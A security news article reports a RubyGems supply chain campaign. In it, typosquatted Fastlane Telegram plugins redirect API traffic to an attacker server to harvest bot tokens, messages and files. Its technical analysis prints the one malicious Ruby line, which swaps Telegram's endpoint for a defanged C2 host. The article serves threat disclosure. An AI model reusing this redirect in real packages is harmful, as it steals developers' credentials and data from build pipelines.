A sophisticated supply chain attack has emerged targeting the RubyGems ecosystem, exploiting geopolitical tensions surrounding Vietnam’s recent Telegram ban to steal sensitive developer credentials and communications.

The malicious campaign involves two typosquatted Ruby gems designed to impersonate legitimate Fastlane plugins, silently redirecting Telegram API traffic through attacker-controlled infrastructure to harvest bot tokens, message content, and attached files.

The timing of this attack is particularly concerning, as the malicious packages appeared just days after Vietnam ordered a nationwide blocking of Telegram on May 21, 2025.

The threat actor behind the campaign strategically marketed these gems as “proxy” plugins to exploit the increased demand for Telegram workarounds among developers affected by the ban.

This opportunistic approach demonstrates how cybercriminals are rapidly adapting to exploit geopolitical events for targeted supply chain attacks.

Socket.dev analysts identified the campaign through their threat research team, uncovering two malicious gems published under the aliases Bùi nam, buidanhnam, and si_mobile.

The packages Fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram were designed to impersonate the legitimate fastlane-plugin-telegram project, which has over 600,000 downloads and is widely used for sending deployment notifications to Telegram channels from CI/CD pipelines.

The attack’s sophistication lies in its minimal code modification approach. The threat actor copied the original project’s README, preserved the public API, and retained expected plugin behavior while making only one critical change.

The impact extends far beyond simple credential theft, as Fastlane operates within CI/CD pipelines that handle sensitive assets including signing keys, release binaries, and environment secrets, potentially compromising entire software build and release workflows.

Technical Analysis of the Infection Mechanism

The malicious gems represent a masterclass in deceptive simplicity, achieving maximum impact through minimal code alteration.

The threat actor’s approach centered on replacing a single line of code that redirects network traffic from Telegram’s legitimate API endpoint to an attacker-controlled command and control server.

In the legitimate Fastlane-plugin-telegram, messages are sent directly to Telegram’s official API using the standard endpoint:

uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")

However, in the malicious versions, this critical line was replaced with a hardcoded C2 endpoint:-

# Threat actor's proxy C2 endpoint; not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")

This subtle substitution enables the threat actor to automatically capture bot tokens, chat identifiers, message content, and any uploaded files while maintaining the plugin’s expected functionality.

The malicious endpoint, hosted on Cloudflare Workers, presents itself as a benign Telegram Bot API proxy, claiming not to store or modify bot tokens.

However, the implementation remains entirely opaque, with no published source code or transparency measures that would characterize a legitimate proxy service.

The persistence of this attack vector is particularly troubling, as stolen tokens remain valid until manually revoked, creating a window for ongoing unauthorized access to victim Telegram bots and their associated data streams.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests